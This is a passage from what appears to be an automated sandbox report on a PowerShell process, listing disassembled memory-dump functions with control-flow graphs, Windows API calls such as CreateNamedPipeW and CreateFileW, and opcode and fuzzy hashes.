                                                                                                                control_flow_graph 1570 819ecb0-819ed1a 1572 819ed1c-819ed22 1570->1572 1573 819ed25-819ed2e 1570->1573 1572->1573 1574 819ed4d-819ed51 1573->1574 1575 819ed30-819ed4c 1573->1575 1576 819ed53-819ed6a 1574->1576 1577 819ed72-819ede0 CreateNamedPipeW 1574->1577 1575->1574 1576->1577 1579 819ede9-819ee27 1577->1579 1580 819ede2-819ede8 1577->1580 1584 819ee29-819ee2d 1579->1584 1585 819ee3c-819ee40 1579->1585 1580->1579 1584->1585 1586 819ee2f-819ee32 1584->1586 1587 819ee51 1585->1587 1588 819ee42-819ee4e 1585->1588 1586->1585 1590 819ee52 1587->1590 1588->1587 1590->1590
                                                                                                                APIs
                                                                                                                • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 0819EDD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateNamedPipe
                                                                                                                • String ID:
                                                                                                                • API String ID: 2489174969-0
                                                                                                                • Opcode ID: 619936d530a1dd5f143c3ef1fcbc104c9f51ee51b71553f147c9535581a2cdfd
                                                                                                                • Instruction ID: 957b2601a6800ed7219612a7cc5d884c8f56b481cdcb201bac156946fda319b8
                                                                                                                • Opcode Fuzzy Hash: 619936d530a1dd5f143c3ef1fcbc104c9f51ee51b71553f147c9535581a2cdfd
                                                                                                                • Instruction Fuzzy Hash: 3F51E3B1D017489FDB14CFA9C884B9EFBF6AF49304F24852AE408AB250D7B59985CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08190040 Relevance: .7, Instructions: 705COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 846089d8f47f4369732ed6b2bbe99ee06e8976e49613233ff47b9c6a6c2ae787
                                                                                                                • Instruction ID: 7d1be6d8cbbf8f6fc9a9f90c48208f7805abd8c82a5e9fc0596953854b0d2018
                                                                                                                • Opcode Fuzzy Hash: 846089d8f47f4369732ed6b2bbe99ee06e8976e49613233ff47b9c6a6c2ae787
                                                                                                                • Instruction Fuzzy Hash: 18527E74A00609DFEB14DF64C850BAEB3B2BF89305F1185A9E949AB350DB35ED42CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08300040 Relevance: .6, Instructions: 634COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9d3601c3216c2ee9ae1d7251dd4b516586fd1ac9bf7df69eaec74e9d30bbcec
                                                                                                                • Instruction ID: 0857fdcb43ca3c7acd7264702749fb9ad55e682526ec41a27b4d53a1475815a5
                                                                                                                • Opcode Fuzzy Hash: b9d3601c3216c2ee9ae1d7251dd4b516586fd1ac9bf7df69eaec74e9d30bbcec
                                                                                                                • Instruction Fuzzy Hash: 52428E34A00215DFEB249BA4C850BEAB776EF88304F1185EAE5097B795DF71AD81CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08705908 Relevance: .4, Instructions: 397COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0a5bca416fdbd94342e2614cffae4e8b113611ba0df7969b01c746ba9733e65f
                                                                                                                • Instruction ID: 44fcaf8764d8a874ee1ac95ecafc31b1fd8a866ab1a6dc215cf6a3a2ee0d142a
                                                                                                                • Opcode Fuzzy Hash: 0a5bca416fdbd94342e2614cffae4e8b113611ba0df7969b01c746ba9733e65f
                                                                                                                • Instruction Fuzzy Hash: 85E1EF38B00209DFCB04DBA5D5546AEBBF6EF85305F048869D905EB394DB34AD46CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0830003F Relevance: .4, Instructions: 360COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d000056cfc08502bad55199e26c039842c9feb8a516c9a34fb25a8015746b112
                                                                                                                • Instruction ID: ba93aca9f03d5dbefad4944f076401d727c7c7404ec747a0907ab9f435c95a5e
                                                                                                                • Opcode Fuzzy Hash: d000056cfc08502bad55199e26c039842c9feb8a516c9a34fb25a8015746b112
                                                                                                                • Instruction Fuzzy Hash: 69E19D34B002159FEB149BA4C850BEAB776EF89304F1185E9E4097B791DF74AD81CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08197808 Relevance: .2, Instructions: 231COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 87052776d835b73d7eb7612ee5e6e05c6e226e562eee03b1ef89d2ae0c342eeb
                                                                                                                • Instruction ID: 725f56965f0f8c72dc288dbb3e3ef7b69377e5f45af58d60bd21a5173af48bf3
                                                                                                                • Opcode Fuzzy Hash: 87052776d835b73d7eb7612ee5e6e05c6e226e562eee03b1ef89d2ae0c342eeb
                                                                                                                • Instruction Fuzzy Hash: 29A1AF74610205CFEB19DF34C454BAEBBE2BF88315F1589ACD5469B3A0CB34E942CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08311D38 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3%H "$4%K!#
                                                                                                                • API String ID: 0-3122839363
                                                                                                                • Opcode ID: f0ae5f101b4f91a586475b4b626465f7ebeacda5ad3389c11fc0d427ed6567d9
                                                                                                                • Instruction ID: 26d1a4e1f9c4347c1304c321ed0865200002328f8c2edae4148e13f170eb64e4
                                                                                                                • Opcode Fuzzy Hash: f0ae5f101b4f91a586475b4b626465f7ebeacda5ad3389c11fc0d427ed6567d9
                                                                                                                • Instruction Fuzzy Hash: C762B034B00215CFCF28DBA8C540AABB3F6EFC9A16B14856ED9559B745CB31DC42CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08308AA0 Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 505 8308aa0-8308ad3 508 8308ad5 505->508 509 8308ada-8308ae6 505->509 510 8309012-8309019 508->510 512 8308af5-8308b02 509->512 513 8308ae8-8308af0 509->513 516 8308b04-8308b32 512->516 517 8308b55-8308b6c 512->517 513->510 526 8308b34-8308b39 516->526 527 8308b3b 516->527 522 8308bb5-8308bc1 517->522 523 8308b6e-8308b7a 517->523 531 8308bc3-8308bfa 522->531 532 8308bff-8308c18 522->532 523->522 529 8308b7c-8308bb0 523->529 530 8308b40-8308b50 526->530 527->530 529->510 530->510 531->510 537 8308c93-8308caf 532->537 538 8308c1a-8308c21 532->538 546 8308cb1 537->546 547 8308cb6-8308cba 537->547 538->537 545 8308c23-8308c2a 538->545 545->537 550 8308c2c-8308c38 545->550 546->510 548 8308cc0 547->548 549 8308cbc-8308cbe 547->549 551 8308cc5-8308cd6 548->551 549->551 550->537 554 8308c3a-8308c46 550->554 555 8308f04 551->555 556 8308cdc-8308cea 551->556 554->537 559 8308c48-8308c52 554->559 558 8308f0b-8308f0d 555->558 563 8308cf0-8308cf2 556->563 564 8308efb-8308f02 556->564 560 8308f28-8308f2a 558->560 561 8308f0f-8308f11 558->561 559->537 570 8308c54-8308c8e 559->570 565 8308f3c-8308f46 560->565 566 8308f2c-8308f3a 560->566 568 8308f19-8308f1d 561->568 572 8308cfa-8308d05 563->572 564->558 574 8308f48-8308f52 565->574 575 8308f5e-8308faa 565->575 566->565 568->560 571 8308f1f-8308f25 568->571 570->510 571->560 576 8308ef2-8308ef9 572->576 577 8308d0b-8308d1d 572->577 574->575 582 8308f54-8308f56 574->582 604 8308fb4-8308fb8 575->604 605 8308fac-8308fb2 575->605 576->558 577->558 584 8308d23-8308d3a 577->584 585 8308fc3-8308fc7 582->585 586 8308f58-8308f5c 582->586 596 8308d40-8308d65 584->596 597 8308e38-8308e4f 584->597 589 8308fd2-8308fd4 585->589 590 8308fc9-8308fcf 585->590 586->575 586->585 592 8309000-830900b 589->592 593 8308fd6-8308ffd 589->593 590->589 592->510 593->592 609 830901a-830907f 596->609 610 8308d6b-8308d73 596->610 597->558 611 8308e55-8308e94 597->611 604->589 606 8308fba-8308fc1 604->606 605->589 606->589 626 8309081 609->626 627 8309086-83090cd 609->627 612 8308df5-8308e01 610->612 613 8308d79-8308d8c 610->613 632 8308eb3-8308ef0 611->632 633 8308e96-8308ea3 611->633 612->558 618 8308e07-8308e33 612->618 613->612 625 8308d8e-8308d9a 613->625 618->558 625->558 631 8308da0-8308dbe 625->631 626->627 643 83090d7 627->643 644 83090cf 627->644 631->558 648 8308dc4-8308df0 631->648 632->558 633->558 639 8308ea5-8308eb1 633->639 639->558 639->632 644->643 648->558
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: /
                                                                                                                • API String ID: 0-2043925204
                                                                                                                • Opcode ID: 17832a99bb8bef258d8cd45ddea57b052c3e3f684bb66dd94a1d50897799934d
                                                                                                                • Instruction ID: caab235504295354099f719bd5b18b0da06b2064894b246d7cd4abb5579b528f
                                                                                                                • Opcode Fuzzy Hash: 17832a99bb8bef258d8cd45ddea57b052c3e3f684bb66dd94a1d50897799934d
                                                                                                                • Instruction Fuzzy Hash: 50025B70B002059FDB04DBACD8A47BEBBAAAFC5205F14896DE506DB391DF719D028F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0819ECAF Relevance: 1.6, APIs: 1, Instructions: 126pipeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1548 819ecaf-819ed1a 1551 819ed1c-819ed22 1548->1551 1552 819ed25-819ed2e 1548->1552 1551->1552 1553 819ed4d-819ed51 1552->1553 1554 819ed30-819ed4c 1552->1554 1555 819ed53-819ed6a 1553->1555 1556 819ed72-819ede0 CreateNamedPipeW 1553->1556 1554->1553 1555->1556 1558 819ede9-819ee27 1556->1558 1559 819ede2-819ede8 1556->1559 1563 819ee29-819ee2d 1558->1563 1564 819ee3c-819ee40 1558->1564 1559->1558 1563->1564 1565 819ee2f-819ee32 1563->1565 1566 819ee51 1564->1566 1567 819ee42-819ee4e 1564->1567 1565->1564 1569 819ee52 1566->1569 1567->1566 1569->1569
                                                                                                                APIs
                                                                                                                • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 0819EDD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateNamedPipe
                                                                                                                • String ID:
                                                                                                                • API String ID: 2489174969-0
                                                                                                                • Opcode ID: aa0a2f88dd61b187bbdbfb2fed6fb4019ae7e0b0ac03ce64b4b4997e45e3681c
                                                                                                                • Instruction ID: cd66a78ea5cbdf60ff703bde2cb9fde4ce394e4926c51c072760c997d60392ba
                                                                                                                • Opcode Fuzzy Hash: aa0a2f88dd61b187bbdbfb2fed6fb4019ae7e0b0ac03ce64b4b4997e45e3681c
                                                                                                                • Instruction Fuzzy Hash: 7551F4B0D013489FDB14CFA9C884B9EFBF6AF48304F24852AE408AB250D7B49985CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08196E20 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1700 8196e20-8196e53 call 8196844 1704 8196e7e-8196f14 1700->1704 1705 8196e55-8196e7d 1700->1705 1713 8196f1c-8196f57 CreateFileW 1704->1713 1714 8196f16-8196f19 1704->1714 1715 8196f59-8196f5f 1713->1715 1716 8196f60-8196f7d 1713->1716 1714->1713 1715->1716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 51bb37f7c01719669c2ba8ac8686d3d5590ebf52a6e64fc3c1a16d2bfae93009
                                                                                                                • Instruction ID: 9f87477bd98518feaa3fc10fe4224ca9f111fd2a0e0cb1acfb90300de88a9a37
                                                                                                                • Opcode Fuzzy Hash: 51bb37f7c01719669c2ba8ac8686d3d5590ebf52a6e64fc3c1a16d2bfae93009
                                                                                                                • Instruction Fuzzy Hash: 5941ACB1A042099FDB00CFA8C845BEEFBF9FF48710F148169E509AB381C7749951CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08196844 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1719 8196844-8196f14 1722 8196f1c-8196f57 CreateFileW 1719->1722 1723 8196f16-8196f19 1719->1723 1724 8196f59-8196f5f 1722->1724 1725 8196f60-8196f7d 1722->1725 1723->1722 1724->1725
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,08196E3F,00000000,00000000,00000003,00000000,00000002), ref: 08196F4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 64aac7bf3778dc2a2c27f36a188ba66295514f9f8c8896a3143f626ed6414e20
                                                                                                                • Instruction ID: 5c010c41a1694178ba9dfe43e4ee4f02d3290bfd0211f43df804464d7731d18e
                                                                                                                • Opcode Fuzzy Hash: 64aac7bf3778dc2a2c27f36a188ba66295514f9f8c8896a3143f626ed6414e20
                                                                                                                • Instruction Fuzzy Hash: 7C2125B2900619AFCF00CF99D944ADEFBB8FF48310F148529E918A7600C375A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04B26CC8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1728 4b26cc8-4b26d1a 1731 4b26d22-4b26d4d GetFileAttributesW 1728->1731 1732 4b26d1c-4b26d1f 1728->1732 1733 4b26d56-4b26d73 1731->1733 1734 4b26d4f-4b26d55 1731->1734 1732->1731 1734->1733
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04B26D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25048382622.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_4b20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: b1ada8bc0ce91ea5d29ec7e97a179223cb16dd515f2ccc765f6fa853706826c4
                                                                                                                • Instruction ID: 85b2dc1a63988bbf42e7ced6ded83e152d799e2df0d43ada71c9ea6ac35e2859
                                                                                                                • Opcode Fuzzy Hash: b1ada8bc0ce91ea5d29ec7e97a179223cb16dd515f2ccc765f6fa853706826c4
                                                                                                                • Instruction Fuzzy Hash: 4B2147B1C006199FCB10CF99D9447DEFBF8FB48324F10852AD818A7640D734AA41CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04B25D0C Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1737 4b25d0c-4b26d1a 1740 4b26d22-4b26d4d GetFileAttributesW 1737->1740 1741 4b26d1c-4b26d1f 1737->1741 1742 4b26d56-4b26d73 1740->1742 1743 4b26d4f-4b26d55 1740->1743 1741->1740 1743->1742
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04B26D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25048382622.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_4b20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 1d2843af792cb5644012fff564173f22745a284bf22ba19fce04f26be96e5e8a
                                                                                                                • Instruction ID: 5b7af57c7d3a907f867b249c826b4513d79262865371df86e9713f1e29d45682
                                                                                                                • Opcode Fuzzy Hash: 1d2843af792cb5644012fff564173f22745a284bf22ba19fce04f26be96e5e8a
                                                                                                                • Instruction Fuzzy Hash: 812133B1D006699BCB10CF9AD94879EFBF8FB48324F10856AD818A7600D774A940CFE5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08196EC0 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1746 8196ec0-8196ec4 1747 8196ef3-8196f14 1746->1747 1748 8196ec6 1746->1748 1750 8196f1c-8196f57 CreateFileW 1747->1750 1751 8196f16-8196f19 1747->1751 1748->1747 1752 8196f59-8196f5f 1750->1752 1753 8196f60-8196f7d 1750->1753 1751->1750 1752->1753
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,08196E3F,00000000,00000000,00000003,00000000,00000002), ref: 08196F4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25180708863.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8190000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: bea58ff2e96aa27f1814a3da2721f230eba5f5274f4536eae58473a277500611
                                                                                                                • Instruction ID: d1be10c3b83559859646df4f7385aa56fe041ce0242a26ad3c755a66e835530e
                                                                                                                • Opcode Fuzzy Hash: bea58ff2e96aa27f1814a3da2721f230eba5f5274f4536eae58473a277500611
                                                                                                                • Instruction Fuzzy Hash: C311E9B690024ADFCF01CF98E804ADEBBB4FF48314F04845AE904AB252C3359A65DFB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0871CEE0 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1756 871cee0-871cf4f SetThreadUILanguage 1758 871cf51-871cf57 1756->1758 1759 871cf58-871cf72 1756->1759 1758->1759
                                                                                                                APIs
                                                                                                                • SetThreadUILanguage.KERNELBASE ref: 0871CF42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189639537.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8710000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LanguageThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 243849632-0
                                                                                                                • Opcode ID: d4ca798ba9a436b1d927934dd4c93bc54e3f15b846c7af5046d7062b000564fe
                                                                                                                • Instruction ID: df398e74c7e301b138f77fa0615134463bcf770efc8ced08860244045c06f98c
                                                                                                                • Opcode Fuzzy Hash: d4ca798ba9a436b1d927934dd4c93bc54e3f15b846c7af5046d7062b000564fe
                                                                                                                • Instruction Fuzzy Hash: B41115B18006498FCB10CF99D488BEEFBF8EF49324F10846AD559A7640C778A545CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D8C38 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: S!
                                                                                                                • API String ID: 0-969837141
                                                                                                                • Opcode ID: d0be6de63e3e96d05b275f6f997e7280f5a8eded2beca62c28f6e6d30c922cd2
                                                                                                                • Instruction ID: c486bead67d94f014ba369a8b38d4aa9b0d2daa8f5c4462e0e7628835718a226
                                                                                                                • Opcode Fuzzy Hash: d0be6de63e3e96d05b275f6f997e7280f5a8eded2beca62c28f6e6d30c922cd2
                                                                                                                • Instruction Fuzzy Hash: 3F916B35A003059FCB04DFA8D590AAEBBB6EF88305F04C968E8559B755CB75EC46CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D8C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: S!
                                                                                                                • API String ID: 0-969837141
                                                                                                                • Opcode ID: cabd3b8d005c62a51dac041257aaf8743e67c63aca6f0cb5f80d230520db8791
                                                                                                                • Instruction ID: 52344e0abde2ad8814a67448c3bd7f7d583067894d31ad637e4a436c66601f17
                                                                                                                • Opcode Fuzzy Hash: cabd3b8d005c62a51dac041257aaf8743e67c63aca6f0cb5f80d230520db8791
                                                                                                                • Instruction Fuzzy Hash: A8917935A003059FCB04DFA8D590AAEBBB6EF88309B04C968E8559B755DB71EC46CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DA4D8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: S!
                                                                                                                • API String ID: 0-969837141
                                                                                                                • Opcode ID: 72836e1e44a99bcf1071e979b470122068f177520d30459e769417f1a4908cef
                                                                                                                • Instruction ID: 6d36acad33f88b9ccef65323609f422d6f26f20ed2bbbc91667a60affb6fb135
                                                                                                                • Opcode Fuzzy Hash: 72836e1e44a99bcf1071e979b470122068f177520d30459e769417f1a4908cef
                                                                                                                • Instruction Fuzzy Hash: 2A818D34A00309DFDB05DFE4D950BAEBBB6EFC4304F248869E805AB744DB78A941CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DC7C8 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x
                                                                                                                • API String ID: 0-2363233923
                                                                                                                • Opcode ID: a2d6fa2df04ec1ca53ca1d3ead0b212aebd7dd7ec9bd8ddbcb2e7a1664551901
                                                                                                                • Instruction ID: 0934fcadcbc968a8ab9cec6d5d34c5562130936c764cea229f0958e16cb85306
                                                                                                                • Opcode Fuzzy Hash: a2d6fa2df04ec1ca53ca1d3ead0b212aebd7dd7ec9bd8ddbcb2e7a1664551901
                                                                                                                • Instruction Fuzzy Hash: 9A212176A043819FD715CB34E880E6ABFB1BF86305B1889ADD94987742D334E803CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870C6F0 Relevance: .7, Instructions: 716COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5138998d2a4d3d5f543b953fae62bf85fc24ef461fac5f38486e4203e1466b6
                                                                                                                • Instruction ID: 02d0a255c0307bca083a991bf237ad776b14f7a0baa817bbf6177d66f09f68ca
                                                                                                                • Opcode Fuzzy Hash: f5138998d2a4d3d5f543b953fae62bf85fc24ef461fac5f38486e4203e1466b6
                                                                                                                • Instruction Fuzzy Hash: 76428B74B00204DFDB15DFA8C454AAEBBF6AF88305F148569E905EB394EB34D942CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08312BEA Relevance: .6, Instructions: 633COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
